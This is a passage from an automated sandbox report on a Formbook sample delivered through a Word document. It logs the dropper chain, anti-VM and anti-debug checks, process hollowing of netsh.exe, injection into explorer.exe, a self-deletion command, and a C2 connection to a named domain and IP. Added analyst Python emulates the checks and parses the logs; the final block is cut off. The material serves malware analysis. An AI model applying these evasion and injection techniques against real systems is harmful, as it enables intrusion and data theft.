Source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: princedanx[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: princedan85671.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: princedan85671.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@9/10@4/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$OTATION1100630004R2.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC744.tmp
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: QUOTATION1100630004R2.doc Virustotal: Detection: 33%
Source: QUOTATION1100630004R2.doc ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\princedan85671.exe C:\Users\user\AppData\Roaming\princedan85671.exe
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process created: C:\Users\user\AppData\Local\Temp\princedan85671.exe C:\Users\user\AppData\Local\Temp\princedan85671.exe vgyjnbhui
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\princedan85671.exe'
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\princedan85671.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: netsh.pdb source: princedan85671.exe, 00000006.00000002.2223629114.0000000000614000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: princedan85671.exe, netsh.exe

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_001D48B5 push eax; retf 4_2_001D48B6
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_001D29DF push eax; retf 4_2_001D29E0
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_005B1E8E push 8B034575h; retf 4_2_005B1E98
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_005B1787 push esi; ret 4_2_005B1791
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_00692030 push ss; iretd 4_2_00692031
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_004168E0 push eax; iretd 6_2_004168E1
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00416907 push ds; retf 6_2_00416908
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_004093D6 push es; retf 6_2_004093DD
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00416CB4 pushfd ; retf 6_2_00416CBC
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_004176ED push ebx; iretd 6_2_004176EF
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_0041CEB5 push eax; ret 6_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_0041CF6C push eax; ret 6_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_0041CF02 push eax; ret 6_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_0041CF0B push eax; ret 6_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009FDFA1 push ecx; ret 6_2_009FDFB4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C9DFA1 push ecx; ret 8_2_00C9DFB4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_000893D6 push es; retf 8_2_000893DD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_000976ED push ebx; iretd 8_2_000976EF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_000968E0 push eax; iretd 8_2_000968E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00096907 push ds; retf 8_2_00096908
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00096CB4 pushfd ; retf 8_2_00096CBC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009CEB5 push eax; ret 8_2_0009CF08
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009CF0B push eax; ret 8_2_0009CF72
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009CF02 push eax; ret 8_2_0009CF08
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009CF6C push eax; ret 8_2_0009CF72

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\AppData\Roaming\princedan85671.exe File created: C:\Users\user\AppData\Local\Temp\princedan85671.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\princedan85671.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (50 occurrences)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX (26 occurrences)
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: princedan85671.exe, 00000004.00000002.2181838241.0000000002451000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
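The RDTSC entries above show the interceptor catching two rdtsc instructions six bytes apart, with the low 32 bits of the first reading parked in ecx before the second one runs. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it scans raw code bytes for back-to-back RDTSC pairs, the static counterpart of what the interceptor observed at run time. The buffer it scans is constructed to contain the stub as disassembled above (xor and add each have two valid encodings; the ones used match the six-byte distance reported) and is not extracted from princedan85671.exe; the image base 0x400000 is assumed from the reported addresses.

```python
"""Static scan for back-to-back RDTSC timing stubs.

Added example, not code from the report or the sample. SAMPLE is a
constructed buffer, not bytes from princedan85671.exe; the image base
0x400000 is assumed from the reported addresses.
"""
import re

RDTSC = re.compile(rb"\x0f\x31")  # opcode of rdtsc

# The 8-byte stub the interceptor reported at 0x4098E4 / 0x4098EA:
#   0f 31   rdtsc
#   33 c9   xor ecx, ecx
#   03 c8   add ecx, eax      (ecx = low 32 bits of the first reading)
#   0f 31   rdtsc
# xor/add each have two valid encodings; these match the 6-byte distance.
STUB = bytes.fromhex("0f3133c903c80f31")
# NOP/RET filler plus two lone RDTSCs far apart, which a pair scanner
# must not report.
SAMPLE = (b"\x90" * 0x20 + STUB + b"\xc3" + b"\x90" * 0x40
          + b"\x0f\x31" + b"\x90" * 0x100 + b"\x0f\x31")


def find_rdtsc_pairs(buf, image_base=0x400000, max_gap=32):
    """(first_va, second_va, bytes_between) for every RDTSC followed by
    another RDTSC within max_gap bytes. The scan ignores instruction
    boundaries, so a 0f 31 inside data or inside a longer instruction is a
    false positive to confirm in a disassembler."""
    offsets = [m.start() for m in RDTSC.finditer(buf)]
    return [(image_base + a, image_base + b, buf[a + 2:b])
            for a, b in zip(offsets, offsets[1:]) if b - a <= max_gap]


def tsc_delta(first_eax, second_eax):
    """The stub keeps only EAX, the low 32 bits of the counter, so the
    difference it can form wraps modulo 2**32; a delta built from the full
    64-bit readings (EDX:EAX) would not."""
    return (second_eax - first_eax) & 0xFFFFFFFF


if __name__ == "__main__":
    for first, second, between in find_rdtsc_pairs(SAMPLE):
        print(f"rdtsc pair at {first:#x} / {second:#x}, between: {between.hex()}")
    print(hex(tsc_delta(0xFFFFFFF0, 0x10)))
```

Widening max_gap trades recall for noise: the stub above only needs six bytes, but timing checks that wrap a CPUID or a call to a trapped API between the two readings need a larger window.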
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Window / User API: threadDelayed 1631
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2572 Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\princedan85671.exe TID: 2492 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 2524 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Thread delayed: delay time: 922337203685477
Source: princedan85671.exe Binary or memory string: 3V97MjDwzNY10/CE3FdlPTc3QDRJmTHAfugGZ6zy6kRSVp+JZqpfk8Ffo9rd0+zrd2KPwKN3IwbD9bQLswwzDhyn4PdAUcVsBK5n\77208IwpEVv/3DMWkIIYr+GO0CgNtkcu/AzuJ1M8gweiCBUod5UYqcxkP0QAKl0hwizDJ5b4pZws5eikxSjRN4UuQgGFVmciINBjSJ\7NLLQdzKojxbpxogKKZWM8B1Zm8STIrPk9ANQxogWqeZZSr2a6ZmW+yC
Source: princedan85671.exe, 00000004.00000002.2181838241.0000000002451000.00000004.00000001.sdmp Binary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: explorer.exe, 00000007.00000000.2211182513.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.2194776377.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: princedan85671.exe, 00000004.00000002.2181838241.0000000002451000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000007.00000000.2194586401.00000000041AD000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: princedan85671.exe Binary or memory string: drNC7TIZTDW2xdJg6023IiTjmTuQlBYEtkPt+T/Us4SLdWi2qlCcddJ8V\7R0tAT+wpPaK51PoqE0nSbQ8X0gIV1QeMUdu7fBCInEO6ADyk+Y6Pj50bA89PiZBRwnUO9K3Ns0/btgvn5n7ypGhhTP0mZCoNxZCnK\7nl3WEoY5NqGqiGi1R8cYbO9DuvgNpNPQlR0tOwm091GcDraPdworFfl+/7zsOq5SWDlDvKmIEUiEy8m9CKUXDLxi9/PJynX1DX
Source: princedan85671.exe, 00000004.00000002.2181838241.0000000002451000.00000004.00000001.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: explorer.exe, 00000007.00000000.2211227110.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: princedan85671.exe Binary or memory string: w9pCcvmCiBslevp3ENTZ7Gyl/KlvjcVV5O5tkWLNvHWw9ziuxOZ14kJmcS95b5CG53h40gwz2mI1prpmN63K34RqlKTfBw\782M5soaHLKwjrxjbF44wWMH/mXEYo9EtG3RCo8RZu8v2iOPMGsDtVxMtQ/RInns4u4kM+YSRbJmUomHt2yet9GjBmvzKjwGocN5e2\7S6Ai96HFLuDqu3p28Ouz3oupVo6bq9Tq4z84+QXrbm011Rn3/M4xD+nOhVufu
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process information queried: ProcessInformation
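The dumped strings in this section spell out the checks: a lookup for SBIEDLL.DLL (Sandboxie), a WQL query against WIN32_BIOS whose fields are matched against VMware|VIRTUAL|A M I|Xen, and a query against Win32_ComputerSystem whose Model is matched against Microsoft|VMWare|Virtual (the stray digits between the strings appear to be dump separators, not parts of the queries). The VMware SATA CD-ROM PnP IDs come from explorer.exe's own memory; they show what this guest exposes rather than proving the sample reads them. The Python below is an added example, not code from the report or the sample: it applies those patterns to constructed guest snapshots so a sandbox operator can see which fields trip them. Case-insensitive matching, the PnP device check, the GuestView container and the scrub helper are assumptions made for the example; the sample's actual comparison routine is not visible in the dump.

```python
"""Emulate the VM / sandbox checks implied by the dumped strings.

Added example, not code from the report or the sample. The two
alternations and the WQL class names come from the strings above; the
case-insensitive matching, the PnP device check and the snapshot/scrub
helpers are assumptions made for the example.
"""
import re
from dataclasses import dataclass, field, replace

BIOS_PATTERN = re.compile(r"VMware|VIRTUAL|A M I|Xen", re.I)   # vs Win32_BIOS fields
MODEL_PATTERN = re.compile(r"Microsoft|VMWare|Virtual", re.I)  # vs Win32_ComputerSystem.Model
PNP_PATTERN = re.compile(r"VMWAR", re.I)  # added: VMware PnP IDs like the CD-ROM above
SANDBOXIE_DLL = "sbiedll.dll"             # SbieDll.dll in-process means Sandboxie


@dataclass
class GuestView:
    """What the checks would see on one machine (constructed, not collected)."""
    bios: dict
    computer_system: dict
    pnp_ids: list = field(default_factory=list)
    modules: list = field(default_factory=list)


VMWARE_GUEST = GuestView(
    bios={"Manufacturer": "Phoenix Technologies LTD",
          "SerialNumber": "VMware-56 4d 3a 2b 7c 1e 90 0f-11 22 33 44 55 66 77 88",
          "SMBIOSBIOSVersion": "6.00"},
    computer_system={"Manufacturer": "VMware, Inc.", "Model": "VMware Virtual Platform"},
    pnp_ids=[r"IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0"],
    modules=["ntdll.dll", "kernel32.dll"])
BARE_METAL = GuestView(
    bios={"Manufacturer": "LENOVO", "SerialNumber": "PF1ABCDE",
          "SMBIOSBIOSVersion": "N2ZET41W (1.01 )"},
    computer_system={"Manufacturer": "LENOVO", "Model": "20XW004UUS"},
    pnp_ids=[r"IDE\CDROMHL-DT-ST_DVDRAM_GU90N________________A1C2____\5&1234ABCD&0&0.0.0"],
    modules=["ntdll.dll", "kernel32.dll"])
SANDBOXIE_HOST = replace(BARE_METAL, modules=BARE_METAL.modules + ["SbieDll.dll"])


def vm_indicators(view):
    """Every field the checks would match, as 'where=value' strings."""
    hits = []
    for key, value in view.bios.items():
        if BIOS_PATTERN.search(str(value)):
            hits.append(f"Win32_BIOS.{key}={value!r}")
    model = str(view.computer_system.get("Model", ""))
    if MODEL_PATTERN.search(model):
        hits.append(f"Win32_ComputerSystem.Model={model!r}")
    for dev in view.pnp_ids:
        if PNP_PATTERN.search(dev):
            hits.append(f"PnP={dev!r}")
    if any(m.lower() == SANDBOXIE_DLL for m in view.modules):
        hits.append("module=SbieDll.dll")
    return hits


def looks_analysed(view):
    """Treat any single hit as positive; the exact decision logic of the
    sample is not visible in the dump."""
    return bool(vm_indicators(view))


def scrub(view, replacement="OEM"):
    """Operator side: rewrite every matched substring to see what a hardened
    guest would have to change (loaded modules are left alone)."""
    return GuestView(
        bios={k: BIOS_PATTERN.sub(replacement, str(v)) for k, v in view.bios.items()},
        computer_system={k: MODEL_PATTERN.sub(replacement, str(v)) if k == "Model" else v
                         for k, v in view.computer_system.items()},
        pnp_ids=[PNP_PATTERN.sub(replacement, d) for d in view.pnp_ids],
        modules=list(view.modules))


if __name__ == "__main__":
    for name, view in (("vmware", VMWARE_GUEST), ("bare metal", BARE_METAL),
                       ("sandboxie", SANDBOXIE_HOST)):
        print(name, looks_analysed(view), vm_indicators(view))
    print("scrubbed vmware:", vm_indicators(scrub(VMWARE_GUEST)))
```

Note that the BIOS alternation includes "A M I" (American Megatrends), which matches plenty of physical boards; a pattern that broad is a hint that the check is tuned to look like the analyst's own images rather than to avoid false positives.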

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00409A90 rdtsc 6_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_0040ACD0 LdrLoadDll, 6_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A026F8 mov eax, dword ptr fs:[00000030h] 6_2_00A026F8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C800EA mov eax, dword ptr fs:[00000030h] 8_2_00C800EA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C80080 mov ecx, dword ptr fs:[00000030h] 8_2_00C80080
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA26F8 mov eax, dword ptr fs:[00000030h] 8_2_00CA26F8
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\netsh.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.anandsharmah.com
Source: C:\Windows\explorer.exe Network Connect: 45.64.105.11 80
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory allocated: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory written: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 1388
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1300000
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory written: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 400000
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory written: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 401000
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory written: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 7EFDE008
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\princedan85671.exe C:\Users\user\AppData\Roaming\princedan85671.exe
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process created: C:\Users\user\AppData\Local\Temp\princedan85671.exe C:\Users\user\AppData\Local\Temp\princedan85671.exe vgyjnbhui
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\princedan85671.exe'
Source: explorer.exe, 00000007.00000000.2184289883.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000000.2184289883.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.2211182513.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.2184289883.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman
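Read together, the entries in this section describe one chain: EQNEDT32.EXE starts Roaming\princedan85671.exe, which allocates RWX memory at base 400000 in a second copy started from Temp and writes a PE image (4D5A) there; the Temp copy then maps sections into explorer.exe (and queues an APC there) and into netsh.exe, whose original image it unmaps at 1300000, i.e. netsh.exe is hollowed; netsh.exe in turn maps into explorer.exe and finally runs cmd.exe /c del on the Temp copy, while the DNS query and the connection to 45.64.105.11:80 are attributed to explorer.exe. netsh.exe is started by explorer.exe with no arguments (see the Lowering of HIPS section below), so in this trace it serves as an injection host rather than as a firewall tool. The Python below is an added example, not code from the report or the sample: it parses these lines (copied from this section, with duplicated lines dropped and the Thread register set lines left out because they name only PID 1388) into a process tree and an injection graph. The parsing rules are written for the line formats that appear in this report only.

```python
"""Process tree and injection graph from this report's behaviour lines.
Added example, not code from the report or the sample; REPORT_LINES are
copied from the section above (duplicates dropped) and the parsing rules
cover only the line formats that appear there."""
import re
from collections import defaultdict
from dataclasses import dataclass

EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
ROAMING = r"C:\Users\user\AppData\Roaming\princedan85671.exe"
TEMP = r"C:\Users\user\AppData\Local\Temp\princedan85671.exe"
EXPLORER = r"C:\Windows\explorer.exe"
NETSH = r"C:\Windows\SysWOW64\netsh.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"

REPORT_LINES = [
    r"Source: C:\Windows\explorer.exe Domain query: www.anandsharmah.com",
    r"Source: C:\Windows\explorer.exe Network Connect: 45.64.105.11 80",
    r"Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory allocated: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 400000 protect: page execute and read and write",
    r"Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory written: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Thread APC queued: target process: C:\Windows\explorer.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1300000",
    r"Source: C:\Users\user\AppData\Roaming\princedan85671.exe Memory written: C:\Users\user\AppData\Local\Temp\princedan85671.exe base: 7EFDE008",
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\princedan85671.exe C:\Users\user\AppData\Roaming\princedan85671.exe",
    r"Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process created: C:\Users\user\AppData\Local\Temp\princedan85671.exe C:\Users\user\AppData\Local\Temp\princedan85671.exe vgyjnbhui",
    r"Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\princedan85671.exe'",
    r"Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe",
]

VERBS = {"Process created": "spawn", "Memory allocated": "alloc",
         "Memory written": "write", "Section loaded": "map",
         "Section unmapped": "unmap", "Thread APC queued": "apc",
         "Network Connect": "connect", "Domain query": "dns"}
LINE_RE = re.compile(r"^Source: (?P<src>.+?) (?P<verb>"
                     + "|".join(map(re.escape, VERBS)) + r"): (?P<arg>.*)$")
# Target is the first path ending in .exe (some lines label it), otherwise
# the whole argument (an "ip port" pair or a domain).
TARGET_RE = re.compile(r"^(?:unknown target: |target process: )?"
                       r"(?P<target>.*?\.exe|.+)(?P<rest>.*)$", re.I)


@dataclass(frozen=True)
class Event:
    source: str
    kind: str
    target: str  # child image, injected image, "ip port" or domain
    detail: str  # command line, base address, protection, ...


def parse_events(lines):
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            t = TARGET_RE.match(m["arg"])
            events.append(Event(m["src"], VERBS[m["verb"]], t["target"], t["rest"].strip()))
    return events


EVENTS = parse_events(REPORT_LINES)


def process_tree(events):
    """child image -> parent image, from the 'Process created' lines."""
    return {e.target: e.source for e in events if e.kind == "spawn"}


def spawn_cmdlines(events):
    return {e.target: e.detail for e in events if e.kind == "spawn"}


def ancestry(events, image):
    """image and its parents up to the first process the report does not
    show being created (explorer.exe is the pre-existing shell)."""
    tree, chain = process_tree(events), [image]
    while chain[-1] in tree and tree[chain[-1]] not in chain:
        chain.append(tree[chain[-1]])
    return chain


def injection_graph(events):
    """(source, target) -> sorted cross-process memory techniques used."""
    graph = defaultdict(set)
    for e in events:
        if e.kind in ("alloc", "write", "map", "unmap", "apc") and e.source != e.target:
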